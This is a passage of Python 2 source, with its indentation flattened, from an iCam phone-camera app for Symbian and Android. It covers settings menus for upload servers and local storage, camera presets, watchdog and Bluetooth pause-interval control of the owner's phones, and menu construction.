if deviceId in [IMEI_E7, IMEI_6120, IMEI_6680, IMEI_N95, IMEI_N82]:
myFields[5] = (u"Use the iCam Server", "combo",
#(yesNoComboList, useiCamServer))
(iCamComboList, useiCamServer))
"""
if MY_DEBUG_STDOUT:
try:
print "SelectServersMenu(), at the beginning:"
print " googleUsername =", googleUsername
print " googlePassword =", googlePassword
print " googleRememberPassword =", googleRememberPassword
print " uploadMediaToYouTube =", uploadMediaToYouTube
print " uploadMediaToPicasa =", uploadMediaToPicasa
print " googleMediaPrivate =", googleMediaPrivate
print " googleKeywords =", googleKeywords
print " myFields =", myFields
sys.stdout.flush()
except:
DebugPrintErrorTrace()
"""
if ANDROID_OS:
"""
Sort-of-TODO: We get decalated results if we put these here:
username is returned by password . This is an error of the
SL4A event handling, RPC, etc.
See Z:\1PhD\ReVival\Logs\Samsung_i5500\2013_12_15\iCam.cfg
Entered GetGooglePassword().
LoadLocalConfigFromFile(): googlePasswordAux = googleUser.
..
SelectServersMenu(): at the end
googleUsername = [1]
So we read uploadMediaToYouTube uploadMediaToPicasa after
googleUsername and googlePassword.
"""
if False:
uploadMediaToYouTube = DialogMultipleChoices( \
myFields[3][0] + u"?", yesNoComboList, uploadMediaToYouTube)
uploadMediaToPicasa = DialogMultipleChoices( \
myFields[4][0] + u"?", yesNoComboList, uploadMediaToPicasa)
"""
useiCamServer = DialogMultipleChoices( \
myFields[5][0] + u"?", myFields[5][2][0], useiCamServer)
"""
try:
googleUsername = DialogGetInput(myFields[0][0] + ":", "", \
googleUsername)
googlePassword = \
myDroid.dialogGetPassword(myFields[1][0] + ":", "").result
# "For " + googleUsername
if googlePassword is None:
googlePassword = ""
StoreLocalConfigInFile()
except:
DebugPrintErrorTrace()
if True: # See above
uploadMediaToYouTube = DialogMultipleChoices( \
myFields[3][0] + u"?", yesNoComboList, uploadMediaToYouTube)
uploadMediaToPicasa = DialogMultipleChoices( \
myFields[4][0] + u"?", yesNoComboList, uploadMediaToPicasa)
googleMediaPrivate = DialogMultipleChoices(myFields[6][0], \
myFields[6][2][0], googleMediaPrivate)
googleKeywords = DialogGetInput(myFields[7][0] + ":", "",
googleKeywords)
elif SYMBIAN_OS:
try:
# Initialize a boolean variable to know whether the form is saved.
serversFormSaved = False
# appuifw.app.title = u"YouTube/Picasa".
appuifw.app.title = u"Select Servers"
# Creates the form:
#serversForm = appuifw.Form(myFields, flags = appuifw.FFormEditModeOnly)
#serversForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
#serversForm = appuifw.Form(myFields, appuifw.FFormDoubleSpaced)
serversForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly |
appuifw.FFormDoubleSpaced)
# Define a function to be called when the form is saved.
def ServersFormOnSave(arg):
global serversFormSaved
global googlePassword
try:
serversFormSaved = True
myAnswer = appuifw.query(u"Enter YouTube/Picasa " \
"password? WARNING: password will be " \
"visible when edited.", "query")
"""
DebugPrint("SelectServersMenu(): myAnswer = %s" % \
str(myAnswer))
"""
# If press Cancel, myAnswer is None.
if myAnswer == True:
resStr = appuifw.query(
u"Enter YouTube/Picasa password:",
"text", unicode(GetGooglePassword())) # "code"
if resStr is not None:
googlePassword = str(resStr)
except:
DebugPrintErrorTrace()
return True
# Assign the save function.
serversForm.save_hook = ServersFormOnSave
"""
From http://discussion.forum.nokia.com/forum/showthread.php?137062-How-to-avoid-quot-Save-quot-command-in-appuifw.Form-%28Make-quot-Auto-Save-quot-form%29
"""
#serversForm.menu = [(u"Enter Password", ServersFormOnSave)]
#"My Save" "Test Login Google"
#Show the form. This operation is blocking until we close the form.
serversForm.execute()
# After the form is saved and closed, display the information.
if serversFormSaved == True:
"""
print serversForm[0][2]
print models[serversForm[1][2][1]]
print serversForm[2][2]
print time.strftime("%d/%m/%Y",
time.localtime(serversForm[3][2]))
print time.strftime(time.ctime(serversForm[4][2])[11:20])
"""
"""
appuifw.note(unicode("Google Username: " +
serversForm[0][2]), "info")
appuifw.note(unicode("Google Password: " +
serversForm[1][2]), "info")
appuifw.note(unicode("YouTube: " +
uploadMediaToYouTubeComboList[serversForm[2][2][1]]),
"info")
appuifw.note(unicode("Picasa: " +
uploadMediaToPicasaComboList[serversForm[3][2][1]]),
"info")
appuifw.note(unicode("YouTube/Picasa: " + serversForm[4][2]),
"info")
"""
googleUsername = serversForm[0][2]
# googlePassword = serversForm[1][2]
"""
The combo form field value is a long integer. We convert it to
int because we would receive
"TypeError: Form combo field, bad index"
at the next instantiation of appuifw.Form().
"""
googleRememberPassword = int(serversForm[2][2][1])
uploadMediaToYouTube = int(serversForm[3][2][1])
uploadMediaToPicasa = int(serversForm[4][2][1])
useiCamServer = int(serversForm[5][2][1])
googleMediaPrivate = int(serversForm[6][2][1])
googleKeywords = serversForm[7][2]
#!!!!TODO
#btNetSearchKeywords = serversForm[7][2]
# It seems serversForm[2][2] is unicode
ICAM_SERVER_NAME = str(serversForm[8][2])
StoreLocalConfigInFile()
StoreState()
except:
DebugPrintErrorTrace()
"""
# Does not work in Python 2.2 (e.g., PyS60 1.4.5)
finally:
appuifw.app.title = ICAM_APP_TITLE
"""
appuifw.app.title = ICAM_APP_TITLE
# """
if MY_DEBUG_STDOUT:
try:
print "SelectServersMenu(): at the end"
print " googleUsername =", googleUsername
# print " googlePassword =", googlePassword
print " googleRememberPassword =", googleRememberPassword
print " uploadMediaToYouTube =", uploadMediaToYouTube
print " uploadMediaToPicasa =", uploadMediaToPicasa
print " useiCamServer =", useiCamServer
print " googleMediaPrivate =", googleMediaPrivate
print " googleKeywords =", googleKeywords
sys.stdout.flush()
except:
DebugPrintErrorTrace()
# """
# This var is required as a global.
miscFormSaved = False
def MiscellaneousSettingsMenu():
global miscFormSaved
global startAutomatically, readGPS, storeLocallyMedia, LOCAL_FOLDER
global numThreadsUpload
global BATTERY_LEVEL_THRESHOLD
global MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2, \
MY_DEBUG_UPLOAD_MSG
DebugPrint("Entered MiscellaneousSettingsMenu().")
# Create a list to be used in "combo" selection mode.
yesNoComboList = [u"No", u"Yes"]
noComboList = [u"No"]
mask = (MY_DEBUG_STDOUT << 3) + (MY_DEBUG_STDERR << 2) + \
(MY_DEBUG_STDERR_2 << 1) + MY_DEBUG_UPLOAD_MSG
myFields = [
(u"Start broadcasting automatically", "combo",
(yesNoComboList, startAutomatically)),
#u"Media Storage"
(u"Store Locally", "combo",
(yesNoComboList, storeLocallyMedia)),
(u"iCam Folder", "text", unicode(LOCAL_FOLDER)),
(u"Number of upload threads for burst mode", "number",
numThreadsUpload),
(u"Battery level threshold % (for PM)", "number",
BATTERY_LEVEL_THRESHOLD),
#(u"Debug logging (all; mask=%d)" % mask, "combo", (yesNoComboList,
(u"Debug logging (all)", "combo", (yesNoComboList,
MY_DEBUG_STDOUT or MY_DEBUG_STDERR or
MY_DEBUG_STDERR_2 or MY_DEBUG_UPLOAD_MSG))
# add Log: MY_DEBUG_*!!!!
]
if ANDROID_OS:
try:
startAutomatically = DialogMultipleChoices( \
myFields[0][0] + u"?", yesNoComboList, int(startAutomatically))
storeLocallyMediaStrList = [ u"Do not store media", \
u"Store all media" ]
storeLocallyMedia = DialogMultipleChoices(myFields[1][0], \
storeLocallyMediaStrList, int(storeLocallyMedia))
StoreState()
except:
# StoreLocalConfigInFile()
DebugPrintErrorTrace()
elif SYMBIAN_OS:
try:
# Initialize a boolean variable to know whether the form is saved.
miscFormSaved = False
# appuifw.app.title = u"YouTube/Picasa"
appuifw.app.title = u"Misc"
# Creates the form
"""
#define KFormEditModeOnly 0x0001
#define KFormViewModeOnly 0x0002
#define KFormAutoLabelEdit 0x0004
#define KFormAutoFormEdit 0x0008
#define KFormDoubleSpaced 0x0010
# miscForm = appuifw.Form(myFields,
# flags = appuifw.FFormEditModeOnly)
# miscForm = appuifw.Form(myFields,
# appuifw.FFormEditModeOnly)
"""
miscForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly | \
appuifw.FFormDoubleSpaced)
# Define a function to be called when the form is saved.
def MiscFormOnSave(arg):
global miscFormSaved
miscFormSaved = True
return True
# Assign the save function.
miscForm.save_hook = MiscFormOnSave
#Show the form. This operation is blocking until we close the form.
miscForm.execute()
# After the form is saved and closed, display the information.
if miscFormSaved == True:
"""
The combo form field value is a long integer.
We convert it to int because we would receive
"TypeError: Form combo field, bad index"
at the next instantiation of appuifw.Form().
"""
startAutomatically = int(miscForm[0][2][1])
storeLocallyMedia = int(miscForm[1][2][1])
if LOCAL_FOLDER != str(miscForm[2][2]):
# It seems miscForm[2][2] is unicode
LOCAL_FOLDER = str(miscForm[2][2])
DebugPrint("MiscellaneousSettingsMenu(): set " \
"LOCAL_FOLDER = %s" % LOCAL_FOLDER)
global LOCAL_FOLDER_MEDIA_FILES, LOCAL_FOLDER_UNSENT_FILES
LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER + "/Media"
LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
CreateDirectoriesAndLogFiles()
numThreadsUpload = int(miscForm[3][2])
BATTERY_LEVEL_THRESHOLD = int(miscForm[4][2])
MY_DEBUG_STDOUT = int(miscForm[5][2][1])
MY_DEBUG_STDERR = int(miscForm[5][2][1])
MY_DEBUG_STDERR_2 = int(miscForm[5][2][1])
MY_DEBUG_UPLOAD_MSG = int(miscForm[5][2][1])
StoreState()
except:
#StoreLocalConfigInFile()
DebugPrintErrorTrace()
"""
# Doesn't work in Python 2.2 (e.g., PyS60 1.4.5).
finally:
appuifw.app.title = ICAM_APP_TITLE
"""
appuifw.app.title = ICAM_APP_TITLE
# """
if MY_DEBUG_STDOUT:
try:
print "MiscellaneousSettingsMenu(): at the end"
print " startAutomatically =", startAutomatically
print " readGPS =", readGPS
sys.stdout.flush()
except:
DebugPrintErrorTrace()
# """
# This var is required as a global.
analysisFormSaved = False
def MediaAnalysisMenu():
global analysisFormSaved
# global burstModeIsStarted
global motionDetectionIsOn
# Create a list to be used in "combo" selection mode
yesNoComboList = [u"No", u"Yes"]
noComboList = [u"No"]
myFields = [(u"Use Motion Detection for Photo Burst Mode", "combo",
(yesNoComboList, motionDetectionIsOn))]
if ANDROID_OS:
try:
pass
except:
DebugPrintErrorTrace()
elif SYMBIAN_OS:
try:
# Initialize a boolean variable to know whether the form is saved.
analysisFormSaved = False
#appuifw.app.title = u"Motion Detection"
appuifw.app.title = u"Media Analysis"
# Creates the form
#analysisForm = appuifw.Form(myFields,
# flags = appuifw.FFormEditModeOnly)
#analysisForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
#analysisForm = appuifw.Form(myFields, appuifw.FFormDoubleSpaced)
analysisForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly |
appuifw.FFormDoubleSpaced)
# Define a function to be called when the form is saved.
def AnalysisFormOnSave(arg):
global analysisFormSaved
analysisFormSaved = True
return True
# Assign the save function.
analysisForm.save_hook = AnalysisFormOnSave
#Show the form. This operation is blocking until we close the form.
analysisForm.execute()
# After the form is saved and closed, display the information.
if analysisFormSaved == True:
"""
The combo form field value is a long integer.
We convert it to int because we would receive
"TypeError: Form combo field, bad index"
at the next instantiation of appuifw.Form().
"""
motionDetectionIsOn = int(analysisForm[0][2][1])
# viewFinderSize = (80, 60)
# photoResolutionIndex = 2 #Why?
# SetUploadedPhotoResolutionIndex(2)
DebugPrint("MediaAnalysisMenu(): motionDetectionIsOn = %d" % \
motionDetectionIsOn)
StoreState()
except:
# StoreLocalConfigInFile()
DebugPrintErrorTrace()
"""
# Doesn't work in Python 2.2 (e.g., PyS60 1.4.5).
finally:
appuifw.app.title = ICAM_APP_TITLE
"""
appuifw.app.title = ICAM_APP_TITLE
"""
PyS60 menu:
Start Broadcasting
Select Preset Mode
Main - Video Record
Main - Take Photo
Main - Burst Photos
Main - Burst Videos
Capture What
Viewfinder
Settings
Select Servers
Select Access Point
Record Config
Photo Config
Pause Interval
#Motion Detection
Media Analysis
Misc
# Select BT Mode (Maybe call it Communication/Networking Config)
Bluetooth Intranet
Display Info
Help
Exit
"""
def SelectPresetMainVideoRecord():
global cameraMode, videoRecordDuration, readGPS, pauseInterval, \
localPhotoResolutionIndex, photoResolutionIndex
global videoAudioEnabled, localVideoModeIndex, storeLocallyMedia
cameraMode[0] = 1
cameraMode[1] = 0
#videoRecordDuration[0] = 30
readGPS = 0
pauseInterval = 120
# localPhotoResolutionIndex[0] = 0
# "Use Local Resolution"
# photoResolutionIndex = 1
videoAudioEnabled = 1
# localVideoModeIndex = !!!!
storeLocallyMedia = 1
StoreState()
def SelectPresetMainTakePhoto():
global cameraMode, videoRecordDuration, readGPS, pauseInterval, \
localPhotoResolutionIndex, photoResolutionIndex
global videoAudioEnabled, localVideoModeIndex, storeLocallyMedia
cameraMode[0] = 2
cameraMode[1] = 0
# videoRecordDuration[0] = 30
readGPS = 0
pauseInterval = 120
# localPhotoResolutionIndex[0] = 0
# "Use Local Resolution"
photoResolutionIndex = 1
videoAudioEnabled = 1
# localVideoModeIndex = !!!!
storeLocallyMedia = 1
StoreState()
def SelectPresetMainBurstPhotos():
global cameraMode, videoRecordDuration, readGPS, pauseInterval, \
localPhotoResolutionIndex, photoResolutionIndex
global videoAudioEnabled, localVideoModeIndex, storeLocallyMedia
global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer
cameraMode[0] = 2
cameraMode[1] = 0
# videoRecordDuration[0] = 30
readGPS = 0
pauseInterval = 0
# localPhotoResolutionIndex[0] = 0
photoResolutionIndex = 4 # 160x120; 6 = 320x240
# videoAudioEnabled = 1
# localVideoModeIndex = !!!!
# storeLocallyMedia = 1
"""
#if (deviceId == IMEI_N82) or (deviceId == IMEI_E7):
uploadMediaToYouTube = 0
uploadMediaToPicasa = 0
useiCamServer = 2
"""
StoreLocalConfigInFile()
StoreState()
def SelectPresetMainBurstVideos():
global cameraMode, videoRecordDuration, readGPS, pauseInterval, \
localPhotoResolutionIndex, photoResolutionIndex
global videoAudioEnabled, localVideoModeIndex, storeLocallyMedia
global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer
cameraMode[0] = 1
cameraMode[1] = 0
# videoRecordDuration[0] = 30
readGPS = 0
pauseInterval = 0
# localPhotoResolutionIndex[0] = 0
# photoResolutionIndex = 4 #160x120; 6 = 320x240
# videoAudioEnabled = 1
# localVideoModeIndex = !!!!
# storeLocallyMedia = 1
"""
#if (deviceId == IMEI_N82) or (deviceId == IMEI_E7):
uploadMediaToYouTube = 0
uploadMediaToPicasa = 0
useiCamServer = 2
"""
StoreLocalConfigInFile()
StoreState()
def SetCameraParametersMenu():
if SYMBIAN_OS:
"""
/** Specifies the type of exposure. - EExposureAuto is the default
value. */
enum TExposure
{
/** Set exposure automatically. Default, always supported. */
EExposureAuto = 0x0000,
/** Night-time setting for long exposures. */
EExposureNight = 0x0001,
/** Backlight setting for bright backgrounds. */
EExposureBacklight = 0x0002,
/** Centered mode for ignoring surroundings. */
EExposureCenter = 0x0004,
/** Sport setting for very short exposures. */
EExposureSport = 0x0008,
/** Generalised setting for very long exposures. */
EExposureVeryLong = 0x0010,
/** Snow setting for daylight exposure. */
EExposureSnow = 0x0020,
/** Beach setting for daylight exposure with reflective glare. */
EExposureBeach = 0x0040,
/** Programmed exposure setting. */
EExposureProgram = 0x0080,
/** Aperture setting is given priority. */
EExposureAperturePriority = 0x0100,
/** Shutter speed setting is given priority. */
EExposureShutterPriority = 0x0200,
/** User selectable exposure value setting. */
EExposureManual = 0x0400,
/** Exposure night setting with colour removed to get rid of colour
noise. */
EExposureSuperNight = 0x0800,
/** Exposure for infra-red sensor on the camera */
EExposureInfra = 0x1000
};
/** Specifies how the white balance is set. */
enum TWhiteBalance
{
/** Set white balance automatically. Default, always supported. */
EWBAuto = 0x0000,
/** Normal daylight. */
EWBDaylight = 0x0001,
/** Overcast daylight. */
EWBCloudy = 0x0002,
/** Tungsten filament lighting. */
EWBTungsten = 0x0004,
/** Fluorescent tube lighting */
EWBFluorescent = 0x0008,
/** Flash lighting. */
EWBFlash = 0x0010,
/** High contrast daylight primarily snowy */
EWBSnow = 0x0020,
/** High contrast daylight primarily near the sea */
EWBBeach = 0x0040,
/** User configurable mode */
EWBManual = 0x0080,
/** Shade */
EWBShade = 0x0100
};
"""
try:
#camera._my_camera.SetCameraParameters(2, 0, 0, 0, 16, 2, 0)
# #aMode, &aSize, &aZoom, &aFlash, &aExp, &aWhite (2, 4, 8, etc),
# aISORate
# aMode, &aSize, &aZoom, &aFlash, &aExp, &aWhite (2, 4, 8, etc),
# aISORate
camera._my_camera.SetCameraParameters(2, 0, 0, 0, 1, 0, 0)
# camera._my_camera.SetCameraSettings()
camera._my_camera.ApplyCameraSettings()
# """
SleepAndPetWatchdog(10.0)
# aMode, &aSize, &aZoom, &aFlash, &aExp, &aWhite (2, 4, 8, etc),
# aISORate
#camera._my_camera.SetCameraParameters(2, 0, 0, 0, 16, 2, 1)
# aMode, &aSize, &aZoom, &aFlash, &aExp, &aWhite (2, 4, 8, etc),
# aISORate
camera._my_camera.SetCameraParameters(2, 0, 0, 0, 16, 0, 0)
# camera._my_camera.SetCameraSettings()
camera._my_camera.ApplyCameraSettings()
# """
SleepAndPetWatchdog(10.0)
# aMode, &aSize, &aZoom, &aFlash, &aExp, &aWhite (2, 4, 8, etc),
# aISORate
camera._my_camera.SetCameraParameters(2, 0, 0, 0, 0, 0, 0)
except:
DebugPrintErrorTrace()
def StopWatchdog():
"""
When using the phone manually/directly, the alternatives are:
- kill the Watchdog and then, when you want to dedicate the phone for iCam,
restart the phone;
- make iCam's pause interval much bigger (e.g., 10 hr) and keep the
watchdog, but then you have to manually come back and redo the
pause interval.
"""
if SYMBIAN_OS:
DebugPrint("Entered StopWatchdog().")
try:
"""
WatchDog.exe with ID 0xEF1E172D
JBakTaskman reports the running process instance with name
"Watchdog.exe[ef1e172d]0001"
"""
# From test_kill_process.py:
#print("found %d processes" % miso.kill_process(u"Y-Brow*", 0))
#print("found %d processes" % miso.kill_process(u"*[e53540d1]*", 0))
res = miso.kill_process(u"Watchdog*", 0) # 0 is the reason for kill
DebugPrint("StopWatchdog(): miso.kill_process(...) returned " \
"%d (#processes killed)." % res)
except:
DebugPrintErrorTrace()
"""
For Symbian OS:
http://discussion.forum.nokia.com/forum/showthread.php?125168-Python-for-S60-1.4.2-released
"Yep. Seems to be in "pys60-1.4.2_src\src\appui\Python_appui.h".
### KMaxPythonMenuExtensions 30 ###"
"Yes, it's an arbitrary limit. The reason it's not unlimited is that an
entry in the resource file app/Python.rss is needed for every
submenu entry -- or at least that's the only way we could make it
work. You'll need to add more entries there if you want to add more
submenu entries.
Though, is a menu with over 30 entries really usable? What's the
use case?"
http://discussion.forum.nokia.com/forum/showthread.php?144408-appuifw.app.menu-limitations
"I think it's the number of all list items, including submenus..."
"Does not generate the error, but the items in the submenu do not
behave as expected... "
http://discussion.forum.nokia.com/forum/showthread.php?69342-How-many-levels-for-a-menu-app
"The question you were originally asking, i.e. depth, is unfortunately
only 2, meaning that you can have a menu and a submenu in the menu.
A submenu cannot have submenus - this is limited by the underlying
UI framework, not the PyS60 implementation."
PyS60 docs: "The maximum allowed number of items in a menu, or items in a
submenu, or submenus in a menu is 30."
"""
#!!!!TODO: compute BT_CLIENTS from btMsgMostRecentTime
BT_CLIENTS = [BT_ADDR_6680, BT_ADDR_6120, BT_ADDR_N95]
def ChangePhonesActivity_real(aPauseInterval):
#if deviceId == IMEI_N82:
"""
ExecuteCommands("set-pause-interval %d" % aPauseInterval)
for btAddrClient in BT_CLIENTS:
ExecuteCommands("send-command-via-bluetooth " + btAddrClient + \
" set-pause-interval %d" % (aPauseInterval * 2))
"""
"""
We create more than one commands file because sending via BT can crash the
iCam S60 version.
"""
pathFileName = LOCAL_FOLDER + "/" + COMMANDS_FILENAME
fOutput = open(pathFileName, "wt")
fOutput.write("set-pause-interval %d" % aPauseInterval)
fOutput.close()
i = 0
for btAddrClient in BT_CLIENTS:
i += 1
fOutput = open(pathFileName + ".%d" % i, "wt")
fOutput.write("send-command-via-bluetooth " + btAddrClient + \
" set-pause-interval %d" % (aPauseInterval * 2))
fOutput.close()
DownloadCommands_real()
ChangePhonesActivity = lambda pauseInterval: lambda : ChangePhonesActivity_real(pauseInterval)
def SetMenu(firstTime=False):
global pauseIntervalStr, photoResolutionStr, phoneModel, deviceId
global readGPS
global numCamerasSupported
global menuTable
global startButtonPressed
DebugPrint("Entered SetMenu().")
if ANDROID_OS:
"""
menuTable = {
#"Config": {"label": "Config", "event": DisplayDeviceId,
# "eventData": None, "iconName": "ic_menu_edit"},
"Display Device Id": {"event": DisplayDeviceId,
"eventData": None,
"iconName": "ic_menu_edit"},
"Exit": {"event": Quit,
"eventData": None,
"iconName": "ic_delete"}
}
"""
def CreateOptionsMenu():
"""
From https://groups.google.com/group/android-scripting/browse_thread/thread/c9f9c43101a93263
"The options menu is implicitly created when you add items to it. "
"""
# myDroid.clearOptionsMenu()
# for myItemKey in menuTable:
for myItemKey in sorted(menuTable.keys()):
"""
If the 2nd element of the tuple-value pointed by myItemKey is
None it is normally an item used only in PyS60.
"""
if menuTable[myItemKey][1] is not None:
#myDroid.addOptionsMenuItem(myItemKey, myItemKey,
# menuTable[myItemKey]["eventData"],
# menuTable[myItemKey]["iconName"])
"""
If it not None we print a different icon than standard.
See http://developer.android.com/reference/android/R.drawable.html
for the various icon name strings.
"""
if menuTable[myItemKey][3] is None:
myDroid.addOptionsMenuItem(str(menuTable[myItemKey][0]),
myItemKey, menuTable[myItemKey][2])
else:
myDroid.addOptionsMenuItem(str(menuTable[myItemKey][0]),
myItemKey, menuTable[myItemKey][2],
menuTable[myItemKey][3])
"""
for myItemKey, itemVal in tel.iteritems():
myDroid.addOptionsMenuItem(myItemKey, myItemKey,
itemVal["eventData"],
itemVal["iconName"])
"""
if firstTime:
if ANDROID_OS_QPYTHON:
#if False: #ANDROID_OS_QPYTHON:
startButtonPressed = True
DisplayNote("Test on QPython.")
ReactiveLoopOnlyIfStartButtonNotAlreadyPressed()
else:
CreateOptionsMenu()
"""
from threading import Thread
uiEventHandlerThread = Thread(target = eventHandler)
uiEventHandlerThread.start()
"""
#thread.start_new_thread(EventHandler, ())
MyThreadStart(EventHandler)
# (videoFileName, videoPathFileName))
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
try:
"""
IMPORTANT: myAppMenu has at most 23 menu and submenu (-3 which are
not added for certain phones) items.
"""
myAppMenuSettings = ( \
(menuTable["0Servers"][0], menuTable["0Servers"][1]), \
(u"Select Access Point", SelectAccessPoint), \
(menuTable["1Record_Config"][0],
menuTable["1Record_Config"][1]), \
(u"Photo Config", PhotoConfigMenu), \
(u"Pause Interval", PauseIntervalMenu), \
#(u"Motion Detection", AnalysisMenu), \
(u"Media Analysis", MediaAnalysisMenu), \
(menuTable["Select_BT_Mode"][0],
menuTable["Select_BT_Mode"][1]), \
(u"Misc", MiscellaneousSettingsMenu) \
)
"""
myAppMenu = [ \
(u"Display phone ID", DisplayDeviceId), \
(u"Settings", (myAppMenuSettings))
]
"""
# if gdataModulesImported:
if True:
myAppMenu = [ \
(u"Select Preset Mode", ( \
(u"Main Cam: Video Record",
SelectPresetMainVideoRecord), \
(u"Main Cam: Take Photo", SelectPresetMainTakePhoto), \
(u"Main Cam: Burst Photos",
SelectPresetMainBurstPhotos), \
(u"Main Cam: Burst Videos",
SelectPresetMainBurstVideos) \
#(u"Burst Video Main", ConfirmQuit) \
), \
), \
(menuTable["01CaptureWhat"][0],
menuTable["01CaptureWhat"][1]) \
#(u"YouTube/Picasa", SelectServersMenu)
]
else:
myAppMenu = []
# We (try) do not show Viewfinder menu item while doing video
# recording.
if videoRecordStartTime == -1:
if viewFinderStarted:
if numCamerasSupported >= 1:
myAppMenuVF = ((u"Stop Viewfinder",
StopViewFinderForCameraCallable), )
else:
if numCamerasSupported == 1:
myAppMenuVF = ((u"Start Main Viewfinder",
StartViewFinderForCameraCallable(0,
True)), ) # IMPORTANT: the comma is required
elif numCamerasSupported == 2:
myAppMenuVF = ((u"Start Main Viewfinder",
StartViewFinderForCameraCallable(0,
True)), (u"Start VGA Viewfinder",
StartViewFinderForCameraCallable(1,
True)))
myAppMenu = myAppMenu + [(u"Viewfinder", myAppMenuVF)]
if deviceId == IMEI_E7:
#if deviceId == IMEI_N82:
myAppMenu += [ \
#(menuTable["Display_device_ID"][0],
# menuTable["Display_device_ID"][1]), \
(menuTable["Settings"][0], (myAppMenuSettings)), \
(u"SetCameraParams", SetCameraParametersMenu), \
(menuTable["Display_Info"][0],menuTable["Display_Info"][1])
]
elif deviceId == IMEI_N82:
#elif deviceId == IMEI_E7:
if pauseInterval < 600:
menuStrStandbyActive = u"All phones to sleep"
pauseStandbyActive = PAUSE_INTERVAL_POWER_MANAGED # / 2
else:
menuStrStandbyActive = u"All phones to active"
pauseStandbyActive = 120
myAppMenu += [ \
#(menuTable["Display_device_ID"][0],
# menuTable["Display_device_ID"][1]), \
(menuTable["Settings"][0], (myAppMenuSettings)), \
#(u"SetCameraParams", SetCameraParametersMenu), \
(u"Stop Watchdog", StopWatchdog),
(menuStrStandbyActive, ChangePhonesActivity(pauseStandbyActive)),
(menuTable["Display_Info"][0],menuTable["Display_Info"][1])
]
else:
myAppMenu += [ \
#(menuTable["Display_device_ID"][0],
# menuTable["Display_device_ID"][1]), \
(menuTable["Settings"][0], (myAppMenuSettings)), \
(menuTable["Display_Info"][0],menuTable["Display_Info"][1])
]
"""
if numCamerasSupported == 1:
myAppMenu += [ \
(u"Cameras Used", \
( \
(u"%s" % camerasUsedStr[0], SetCamerasUsed(0)), \
(u"%s" % camerasUsedStr[3], SetCamerasUsed(3)) \
) \
)
]
elif numCamerasSupported == 2:
myAppMenu += [ \
(u"Cameras Used", \
( \
(u"%s" % camerasUsedStr[0], SetCamerasUsed(0)), \
(u"%s" % camerasUsedStr[1], SetCamerasUsed(1)), \
(u"%s" % camerasUsedStr[2], SetCamerasUsed(2)), \
(u"%s" % camerasUsedStr[3], SetCamerasUsed(3)) \
) \
)
]
"""
myAppMenu = myAppMenu + [ \
#(u"Send Inbox SMSes", UploadInboxSMSes), \
(u"Help", Help),
(u"Exit", ConfirmQuit) \
#(u"Exit", Quit) \
#(menuTable["0Exit"][0], menuTable["0Exit"][1])
]
#"""
#(u"Record Duration", SetRecordDurationMenu(0)), \
#(u"Upload Media", Quit), \
#(u"Record Main 7 sec", SetRecordDurationMenu(0)), \
#(u"Record VGA 7 sec", SetRecordDurationMenu(1)), \
#(u"Restart Cellphone", Quit), \
#"""
if firstTime == -1:
pass
elif firstTime != -1:
#if (firstTime == True) or (firstTime == False):
if startButtonPressed:
#myAppMenu = [(u"Start", ReactiveLoop)] + myAppMenu
myAppMenu = [(menuTable["00Stop"][0],
menuTable["00Stop"][1])] + myAppMenu
else:
#myAppMenu = [(u"Start", ReactiveLoop)] + myAppMenu
myAppMenu = [(menuTable["00Start"][0],
menuTable["00Start"][1])] + myAppMenu
appuifw.app.menu = myAppMenu
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
errorStr = "SetMenu(): (free_ram = %d) returned exception %s." \
% (GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
if MY_DEBUG_STDERR:
sys.stderr.write(" " + errorStr + "\n")
DebugPrintErrorTrace()
"""
This has the effect of flushing the eventual pending UI events.
From [Mobile_Python_2007]: "The e32.ao_yield() at the end of the
loop makes sure that the system leaves some time to register
the keyboard events, as drawing in the tight loop consumes lots
of CPU power and might make the system unresponsive."
From PyS60 2.0 documentation: Yields to the active scheduler to have
ready active objects with priority above normal scheduled for
running. This has the effect of flushing the eventual pending UI
events. Note that the UI callback code may be run in the context of
the thread that performs an ao_yield. For information on active
scheduler, see S60 SDK documentation [4].
"""
e32.ao_yield()
elif SYMBIAN_UIQ_OS:
# When executed the code for S60 it gave LDR-IMPORT error, Reason 2??
pass
elif WINDOWS_CE_OS_PYTHONCE:
pass
DebugPrint("Exiting SetMenu().")
def GetTextPauseInterval():
res = ""
try:
secs = pauseInterval
if pauseInterval > 60:
secs = pauseInterval % 60
mins = pauseInterval / 60
else:
mins = 0
if pauseInterval > 3600:
mins = mins % 60
hrs = pauseInterval / 3600
else:
hrs = 0
if pauseInterval > 24 * 3600:
hrs = hrs % 24
days = pauseInterval / (24 * 3600)
else:
days = 0
if days > 0:
res += "%dd " % days
if (hrs > 0) or (res != ""):
res += "%02dh " % hrs
if (mins > 0) or (res != ""):
res += "%02dm " % mins
if (secs >= 0) or (res != ""):
res += "%02ds" % secs
except:
res = "INVALID pause value"
DebugPrintErrorTrace()
return res
def ClearScreen():
global displaySizeMax, displaySizeMin
if SYMBIAN_OS:
try:
# Draw a black rectangle to erase the screen.
if S60_EDITION[0] >= 3:
if appuifw.app.orientation == "landscape":
canvas.rectangle((0, 0, displaySizeMax - 1,
displaySizeMin - 1), fill=0) # , width = 20)
else:
# appuifw.app.orientation == "portrait"
canvas.rectangle((0, 0, displaySizeMin - 1,
displaySizeMax - 1), fill=0) # , width = 20)
else:
canvas.rectangle((0, 0, displaySizeMin - 1,
displaySizeMax - 1), fill=0) # , width = 20)
except:
DebugPrintErrorTrace()
# """
doNotDisplayRedrawInfo = False
myTextMainCam = ""
myTextVGACam = ""
myTextUpload = ""
myTextAPName = ""
myTextVer = ""
myTextGoogle = ""
def ComputeInfoStrings():
global myTextMainCam, myTextVGACam, myTextUpload, myTextAPName, myTextVer
global myTextGoogle
